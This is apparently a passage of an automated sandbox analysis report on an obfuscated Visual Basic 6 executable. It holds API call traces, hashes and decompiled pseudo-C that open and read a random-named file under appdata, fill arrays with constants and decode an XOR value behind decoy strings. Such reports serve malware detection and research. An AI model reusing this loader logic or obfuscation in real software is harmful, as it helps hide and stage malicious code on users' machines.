      0x004200f9

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041FAEE
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FB18
      • __vbaAryConstruct2.MSVBVM60(?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FB28
      • #593.MSVBVM60(0000000A), ref: 0041FB46
      • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041FB51
      • #537.MSVBVM60(000000D4,0000000A), ref: 0041FB5B
      • __vbaStrMove.MSVBVM60(000000D4,0000000A), ref: 0041FB65
      • #648.MSVBVM60(0000000A), ref: 0041FB7C
      • #652.MSVBVM60(?,00000002,?,?,?,0000000A), ref: 0041FBA0
      • #692.MSVBVM60(?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FBB3
      • #522.MSVBVM60(?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FBC0
      • __vbaStrVarVal.MSVBVM60(?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FBD2
      • #514.MSVBVM60(00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FBD8
      • __vbaVarTstNe.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 0041FBF8
      • __vbaFreeStr.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 0041FC07
      • __vbaFreeVarList.MSVBVM60(00000006,?,0000000A,00000002,?,?,00008008,00008008,?,00000000,?,?,00000052,?,?,?), ref: 0041FC2F
      • __vbaVarDup.MSVBVM60 ref: 0041FC63
      • #513.MSVBVM60(?,?,000000A2), ref: 0041FC75
      • __vbaStrVarVal.MSVBVM60(?,?,00000075,00000002,?,?,000000A2), ref: 0041FC96
      • #628.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FC9C
      • __vbaStrMove.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FCA6
      • __vbaFreeStr.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FCAE
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,00000002,00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FCC1
      • __vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FCDC
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 0041FD3E
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,000000C0), ref: 0041FD9D
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B0,000000C0), ref: 0041FDBF
      • #628.MSVBVM60(UNINTERMITTEDLY,00000008,00000002), ref: 0041FDDD
      • #670.MSVBVM60(?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FDF0
      • __vbaVarTstNe.MSVBVM60(?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FDFD
      • __vbaFreeVarList.MSVBVM60(00000003,00000002,00008008,?,?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FE17
      • #525.MSVBVM60(000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE33
      • __vbaStrMove.MSVBVM60(000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE3D
      • #696.MSVBVM60(00000000,000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE43
      • __vbaFreeStr.MSVBVM60(00000000,000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE51
      • #696.MSVBVM60(MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE5B
      • #541.MSVBVM60(?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 0041FE70
      • __vbaStrVarVal.MSVBVM60(?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002), ref: 0041FE7D
      • #696.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002), ref: 0041FE83
      • __vbaFreeStr.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002), ref: 0041FE97
      • __vbaFreeVar.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF8,00000002), ref: 0041FE9F
      • #702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FEFA
      • __vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF04
      • #696.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF0A
      • __vbaFreeStr.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF1F
      • __vbaFreeVar.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF27
      • #696.MSVBVM60(Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF7C
      • #648.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FFBE
      • __vbaFreeVar.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FFD3
      • #648.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420008
      • __vbaFreeVar.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042001D
      • #651.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420048
      • __vbaStrMove.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420052
      • __vbaStrCat.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420058
      • __vbaStrMove.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420062
      • __vbaFreeStr.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042006A
      • __vbaFreeVar.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420072
      • __vbaFreeStr.MSVBVM60(004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200C5
      • __vbaFreeStr.MSVBVM60(004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200CD
      • __vbaFreeStr.MSVBVM60(004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200D5
      • __vbaAryDestruct.MSVBVM60(00000000,?,004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200EC
      • __vbaFreeStr.MSVBVM60(00000000,?,004200FA,?,?,?,?,00402FF8,00000002,?,?,?,?,00401546), ref: 004200F4
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$Move$#696$#648List$#628CheckHresult$#513#514#522#525#537#541#593#651#652#670#692#702ChkstkConstruct2CopyDestructNew2
      • String ID: 2:2:2$:$BESMUDSES$Jiggerens$MINESTRYGNING$PREHISTORICS$Rappees$Suppositoriets$UNINTERMITTEDLY
      • API String ID: 2160480785-2797486545
      • Opcode ID: 740cc0b24e97e91ff2f29ee006d99298746f66b207f1b81d73c25490db96b919
      • Instruction ID: 0027439f186adb7de10d98962c97fdb4750209cdc544478769bcad2128c15f9d
      • Opcode Fuzzy Hash: 740cc0b24e97e91ff2f29ee006d99298746f66b207f1b81d73c25490db96b919
      • Instruction Fuzzy Hash: 1A026E71940218ABDB15EBA0DC96FEDB7B8BF04304F10816FE105BB1E2EB789A45CB54
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041D89C, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 184COMMON
      Download Yara Rule
      C-Code - Quality: 48%
      			E0041D89C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _v44;
				void* _v48;
				char _v64;
				char _v80;
				char _v96;
				char* _v104;
				char _v112;
				char* _v120;
				char _v128;
				void* _v148;
				short _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				short _t78;
				signed int _t79;
				char* _t83;
				char* _t88;
				signed int _t99;
				signed int _t104;
				intOrPtr _t132;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				L00401540();
				_v12 = _t132;
				_v8 = 0x401270;
				_push(L"Scopiformly9");
				_push(L"baadene");
				_push( &_v64); // executed
				L00401732(); // executed
				_v104 = L"Ambulancesagen2";
				_v112 = 0x8008;
				_push( &_v64);
				_t78 =  &_v112;
				_push(_t78);
				L00401738();
				_v152 = _t78;
				L00401828();
				_t79 = _v152;
				if(_t79 != 0) {
					_push(0x1b);
					_push(L"Reklamekampagne4");
					L00401750();
					L0040183A();
					if( *0x4223c0 != 0) {
						_v172 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a0);
						L004017CE();
						_v172 = 0x4223c0;
					}
					_v152 =  *_v172;
					_t99 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v48);
					asm("fclex");
					_v156 = _t99;
					if(_v156 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402590);
						_push(_v152);
						_push(_v156);
						L004017C8();
						_v176 = _t99;
					}
					_v160 = _v48;
					_t104 =  *((intOrPtr*)( *_v160 + 0x118))(_v160,  &_v148);
					asm("fclex");
					_v164 = _t104;
					if(_v164 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x4025b0);
						_push(_v160);
						_push(_v164);
						L004017C8();
						_v180 = _t104;
					}
					_t79 = _v148;
					_v40 = _t79;
					L004017C2();
				}
				L004017B6();
				_push(0x44);
				_push(_v36);
				L00401750();
				L0040183A();
				_push(_t79);
				_push(L"Jordfstedes4");
				L0040172C();
				asm("sbb eax, eax");
				_v152 =  ~( ~( ~_t79));
				L00401846();
				_t83 = _v152;
				if(_t83 != 0) {
					_v104 = L"appdata";
					_v112 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L0040171A();
					_v120 = L"\\XvFu5flZcgudIlwvVLtjOx372";
					_v128 = 8;
					_push( &_v80);
					_push( &_v128);
					_t88 =  &_v96;
					_push(_t88);
					L00401720();
					_push(_t88);
					L00401834();
					L0040183A();
					_push(_t88);
					_push(1);
					_push(0xffffffff);
					_push(0x120);
					L00401726();
					L00401846();
					_push( &_v96);
					_push( &_v80);
					_push( &_v64);
					_push(3);
					L00401840();
					_push(1);
					_push( &_v32);
					_push(0);
					L00401714();
					_push(1);
					L0040170E();
					_push(0xec);
					_push( &_v64);
					L00401708();
					_t83 =  &_v64;
					_push(_t83);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(0x41db88);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t83;
			}


































      0x0041d8a1
      0x0041d8ac
      0x0041d8ad
      0x0041d8b9
      0x0041d8c1
      0x0041d8c4
      0x0041d8cb
      0x0041d8d0
      0x0041d8d8
      0x0041d8d9
      0x0041d8de
      0x0041d8e5
      0x0041d8ef
      0x0041d8f0
      0x0041d8f3
      0x0041d8f4
      0x0041d8f9
      0x0041d903
      0x0041d908
      0x0041d911
      0x0041d917
      0x0041d919
      0x0041d91e
      0x0041d928
      0x0041d934
      0x0041d951
      0x0041d936
      0x0041d936
      0x0041d93b
      0x0041d940
      0x0041d945
      0x0041d945
      0x0041d963
      0x0041d97b
      0x0041d97e
      0x0041d980
      0x0041d98d
      0x0041d9af
      0x0041d98f
      0x0041d98f
      0x0041d991
      0x0041d996
      0x0041d99c
      0x0041d9a2
      0x0041d9a7
      0x0041d9a7
      0x0041d9b9
      0x0041d9d4
      0x0041d9da
      0x0041d9dc
      0x0041d9e9
      0x0041da0e
      0x0041d9eb
      0x0041d9eb
      0x0041d9f0
      0x0041d9f5
      0x0041d9fb
      0x0041da01
      0x0041da06
      0x0041da06
      0x0041da15
      0x0041da1c
      0x0041da23
      0x0041da23
      0x0041da30
      0x0041da35
      0x0041da37
      0x0041da3a
      0x0041da44
      0x0041da49
      0x0041da4a
      0x0041da4f
      0x0041da56
      0x0041da5c
      0x0041da66
      0x0041da6b
      0x0041da74
      0x0041da7a
      0x0041da81
      0x0041da8e
      0x0041da96
      0x0041da9a
      0x0041da9b
      0x0041daa0
      0x0041daa7
      0x0041dab1
      0x0041dab5
      0x0041dab6
      0x0041dab9
      0x0041daba
      0x0041dabf
      0x0041dac0
      0x0041daca
      0x0041dacf
      0x0041dad0
      0x0041dad2
      0x0041dad4
      0x0041dad9
      0x0041dae1
      0x0041dae9
      0x0041daed
      0x0041daf1
      0x0041daf2
      0x0041daf4
      0x0041dafc
      0x0041db01
      0x0041db02
      0x0041db04
      0x0041db09
      0x0041db0b
      0x0041db10
      0x0041db18
      0x0041db19
      0x0041db1e
      0x0041db21
      0x0041db22
      0x0041db2c
      0x0041db34
      0x0041db34
      0x0041db39
      0x0041db6a
      0x0041db72
      0x0041db7a
      0x0041db82
      0x0041db87

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041D8B9
      • #692.MSVBVM60(?,baadene,Scopiformly9,?,?,?,?,00401546), ref: 0041D8D9
      • __vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041D8F4
      • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0041D903
      • #618.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041D91E
      • __vbaStrMove.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041D928
      • __vbaNew2.MSVBVM60(004025A0,004223C0,Reklamekampagne4,0000001B,00008008,?), ref: 0041D940
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041D9A2
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000118,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DA01
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4,0000001B,00008008), ref: 0041DA23
      • __vbaStrCopy.MSVBVM60(00008008,?), ref: 0041DA30
      • #618.MSVBVM60(?,00000044,00008008,?), ref: 0041DA3A
      • __vbaStrMove.MSVBVM60(?,00000044,00008008,?), ref: 0041DA44
      • __vbaStrCmp.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DA4F
      • __vbaFreeStr.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DA66
      • __vbaVarDup.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DA8E
      • #666.MSVBVM60(?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DA9B
      • __vbaVarCat.MSVBVM60(?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DABA
      • __vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DAC0
      • __vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DACA
      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DAD9
      • __vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DAE1
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000), ref: 0041DAF4
      • __vbaGet3.MSVBVM60(00000000,?,00000001), ref: 0041DB04
      • __vbaFileClose.MSVBVM60(00000001,00000000,?,00000001), ref: 0041DB0B
      • #526.MSVBVM60(?,000000EC,00000001,00000000,?,00000001), ref: 0041DB19
      • __vbaStrVarMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DB22
      • __vbaStrMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DB2C
      • __vbaFreeVar.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DB34
      • __vbaFreeStr.MSVBVM60(0041DB88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB6A
      • __vbaFreeStr.MSVBVM60(0041DB88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB72
      • __vbaFreeStr.MSVBVM60(0041DB88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB7A
      • __vbaFreeStr.MSVBVM60(0041DB88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB82
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$Move$#618CheckFileHresult$#526#666#692ChkstkCloseCopyGet3ListNew2Open
      • String ID: Ambulancesagen2$CONTINUATOR$Jordfstedes4$Reklamekampagne4$Scopiformly9$\XvFu5flZcgudIlwvVLtjOx372$appdata$baadene
      • API String ID: 3805544571-2284846736
      • Opcode ID: b3148a8c7af0992b69a4cef94eb25678f357a958fee12bf61983a4a2d946edf0
      • Instruction ID: 883565fa33546568cfc74b515b4cdddcb2f31a5c13bcaadf21b5faae7a44e9a2
      • Opcode Fuzzy Hash: b3148a8c7af0992b69a4cef94eb25678f357a958fee12bf61983a4a2d946edf0
      • Instruction Fuzzy Hash: A571FB71E00218AADB10EBA1CD46FDEB7B8AF05704F50817AF109B71E2DB785A45CF69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00420284, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 307COMMON
      Download Yara Rule
      C-Code - Quality: 60%
      			E00420284(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _v52;
				char _v56;
				void* _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v132;
				intOrPtr _v140;
				char* _v148;
				char _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				intOrPtr* _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _t182;
				signed int _t207;
				char* _t208;
				signed int _t219;
				char* _t221;
				signed int _t223;
				signed int _t229;
				void* _t231;
				signed int _t234;
				char* _t239;
				void* _t246;
				void* _t248;
				void* _t250;
				void* _t252;
				void* _t254;
				void* _t259;
				void* _t261;
				void* _t263;
				void* _t273;
				void* _t282;
				void* _t284;
				intOrPtr _t285;
				void* _t286;

				_t285 = _t284 - 0x18;
				 *[fs:0x0] = _t285;
				L00401540();
				_v28 = _t285;
				_v24 = 0x4013f0;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t282);
				_v8 = 1;
				_v8 = 2;
				_v68 = 0x4fdf6b;
				_v76 = 3;
				_push( &_v76);
				_push( &_v92);
				L0040160C();
				_push( &_v92);
				_push( &_v108);
				L004016BA();
				_v148 = L"FOSTERET";
				_v156 = 0x8008;
				_push( &_v108);
				_t182 =  &_v156;
				_push(_t182);
				L004016AE();
				_v160 = _t182;
				_push( &_v108);
				_push( &_v92);
				_push( &_v76);
				_push(3);
				L00401840();
				_t286 = _t285 + 0x10;
				if(_v160 != 0) {
					_v8 = 3;
					if( *0x4223c0 != 0) {
						_v196 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a0);
						L004017CE();
						_v196 = 0x4223c0;
					}
					_v160 =  *_v196;
					_t229 =  *((intOrPtr*)( *_v160 + 0x14))(_v160,  &_v60);
					asm("fclex");
					_v164 = _t229;
					if(_v164 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402590);
						_push(_v160);
						_push(_v164);
						L004017C8();
						_v200 = _t229;
					}
					_v168 = _v60;
					_v132 = 0x80020004;
					_v140 = 0xa;
					_t231 = 0x10;
					L00401540();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004016B4();
					L0040183A();
					_t234 =  *((intOrPtr*)( *_v168 + 0x13c))(_v168, _t231, 0x5e4c2e);
					asm("fclex");
					_v172 = _t234;
					if(_v172 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x4025b0);
						_push(_v168);
						_push(_v172);
						L004017C8();
						_v204 = _t234;
					}
					L00401846();
					L004017C2();
					_v8 = 4;
					_v68 = 0x16;
					_v76 = 2;
					_push( &_v76);
					_push( &_v92);
					L00401606();
					_v100 = 0xb8;
					_v108 = 2;
					_push( &_v108);
					_push(0xa1);
					_push( &_v92);
					_t239 =  &_v56;
					_push(_t239);
					L00401858();
					_push(_t239);
					L004016A2();
					L0040183A();
					L00401846();
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_push(3);
					L00401840();
					_t286 = _t286 + 0x10;
				}
				_v8 = 6;
				_push(0);
				_push(9);
				_push(1);
				_push(3);
				_push( &_v48);
				_push(4);
				_push(0x80);
				L00401600();
				_v8 = 7;
				 *((intOrPtr*)( *(_v48 + 0xc) + (0 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x27c30;
				_v8 = 8;
				_t246 = 1;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t246 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x94a0c;
				_v8 = 9;
				_t248 = 2;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t248 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x2164a4;
				_v8 = 0xa;
				_t250 = 3;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t250 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x5d9b94;
				_v8 = 0xb;
				_t252 = 4;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t252 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x5a7363;
				_v8 = 0xc;
				_t254 = 5;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t254 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x2787b7;
				_v8 = 0xd;
				_v68 =  *0x40146c;
				_v76 = 4;
				_push( &_v92);
				_t207 =  &_v76;
				_push(_t207);
				L004017A4();
				_v160 = _t207;
				if(_v160 >= 0) {
					_v208 = _v208 & 0x00000000;
				} else {
					_push(_v160);
					L0040179E();
					_v208 = _t207;
				}
				_t208 =  &_v92;
				_push(_t208);
				L0040178C();
				_t273 = 6;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t273 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = _t208;
				_push( &_v92);
				_push( &_v76);
				_push(2);
				L00401840();
				_v8 = 0xe;
				_t259 = 7;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t259 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x37e4a9;
				_v8 = 0xf;
				_t261 = 8;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t261 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x84c244;
				_v8 = 0x10;
				_t263 = 9;
				_t219 =  *(_v48 + 0xc);
				 *((intOrPtr*)(_t219 + (_t263 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x635cea;
				_v8 = 0x11;
				if((_t219 | 0xffffffff) != 0) {
					_v8 = 0x12;
					_v44 = 0x29c1aa;
					_v8 = 0x13;
					_t223 = _v44 ^ 0x0018dd5b;
					_v44 = _t223;
					_v8 = 0x14;
					_push(0xffffffff);
					L004016E4();
					_v8 = 0x15;
					_push(0x3ed0fd);
					L004016B4();
					L0040183A();
					_push(_t223); // executed
					L004015FA(); // executed
					_v40 = _t223;
					L00401846();
				}
				asm("wait");
				_push(0x420748);
				_t221 =  &_v48;
				_push(_t221);
				_push(0);
				L0040173E();
				L00401846();
				return _t221;
			}






















































      0x00420287
      0x00420296
      0x004202a2
      0x004202aa
      0x004202ad
      0x004202b4
      0x004202bb
      0x004202ca
      0x004202cd
      0x004202d4
      0x004202db
      0x004202e2
      0x004202ec
      0x004202f0
      0x004202f1
      0x004202f9
      0x004202fd
      0x004202fe
      0x00420303
      0x0042030d
      0x0042031a
      0x0042031b
      0x00420321
      0x00420322
      0x00420327
      0x00420331
      0x00420335
      0x00420339
      0x0042033a
      0x0042033c
      0x00420341
      0x0042034d
      0x00420353
      0x00420361
      0x0042037e
      0x00420363
      0x00420363
      0x00420368
      0x0042036d
      0x00420372
      0x00420372
      0x00420390
      0x004203a8
      0x004203ab
      0x004203ad
      0x004203ba
      0x004203dc
      0x004203bc
      0x004203bc
      0x004203be
      0x004203c3
      0x004203c9
      0x004203cf
      0x004203d4
      0x004203d4
      0x004203e6
      0x004203ec
      0x004203f3
      0x004203ff
      0x00420400
      0x0042040d
      0x0042040e
      0x0042040f
      0x00420410
      0x00420416
      0x00420420
      0x00420434
      0x0042043a
      0x0042043c
      0x00420449
      0x0042046e
      0x0042044b
      0x0042044b
      0x00420450
      0x00420455
      0x0042045b
      0x00420461
      0x00420466
      0x00420466
      0x00420478
      0x00420480
      0x00420485
      0x0042048c
      0x00420493
      0x0042049d
      0x004204a1
      0x004204a2
      0x004204a7
      0x004204ae
      0x004204b8
      0x004204b9
      0x004204c1
      0x004204c2
      0x004204c5
      0x004204c6
      0x004204cb
      0x004204cc
      0x004204d6
      0x004204de
      0x004204e6
      0x004204ea
      0x004204ee
      0x004204ef
      0x004204f1
      0x004204f6
      0x004204f6
      0x004204f9
      0x00420500
      0x00420502
      0x00420504
      0x00420506
      0x0042050b
      0x0042050c
      0x0042050e
      0x00420513
      0x0042051b
      0x00420530
      0x00420537
      0x00420543
      0x0042054d
      0x00420554
      0x00420560
      0x0042056a
      0x00420571
      0x0042057d
      0x00420587
      0x0042058e
      0x0042059a
      0x004205a4
      0x004205ab
      0x004205b7
      0x004205c1
      0x004205c8
      0x004205d5
      0x004205d8
      0x004205e2
      0x004205e3
      0x004205e6
      0x004205e7
      0x004205ec
      0x004205f9
      0x0042060e
      0x004205fb
      0x004205fb
      0x00420601
      0x00420606
      0x00420606
      0x00420615
      0x00420618
      0x00420619
      0x00420623
      0x0042062d
      0x00420633
      0x00420637
      0x00420638
      0x0042063a
      0x00420642
      0x0042064e
      0x00420658
      0x0042065f
      0x0042066b
      0x00420675
      0x0042067c
      0x00420688
      0x0042068f
      0x00420692
      0x00420699
      0x004206a5
      0x004206a7
      0x004206ae
      0x004206b5
      0x004206bf
      0x004206c4
      0x004206c7
      0x004206ce
      0x004206d0
      0x004206d5
      0x004206dc
      0x004206e1
      0x004206eb
      0x004206f0
      0x004206f1
      0x004206f6
      0x004206fc
      0x004206fc
      0x00420701
      0x00420702
      0x00420734
      0x00420737
      0x00420738
      0x0042073a
      0x00420742
      0x00420747

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 004202A2
      • #575.MSVBVM60(?,00000003), ref: 004202F1
      • #518.MSVBVM60(?,?,?,00000003), ref: 004202FE
      • __vbaVarTstLt.MSVBVM60(00008008,?), ref: 00420322
      • __vbaFreeVarList.MSVBVM60(00000003,00000003,?,?,00008008,?), ref: 0042033C
      • __vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,00401546), ref: 0042036D
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 004203CF
      • __vbaChkstk.MSVBVM60(00000000,?,00402590,00000014), ref: 00420400
      • __vbaStrI4.MSVBVM60(005E4C2E), ref: 00420416
      • __vbaStrMove.MSVBVM60(005E4C2E), ref: 00420420
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,0000013C), ref: 00420461
      • __vbaFreeStr.MSVBVM60(00000000,?,004025B0,0000013C), ref: 00420478
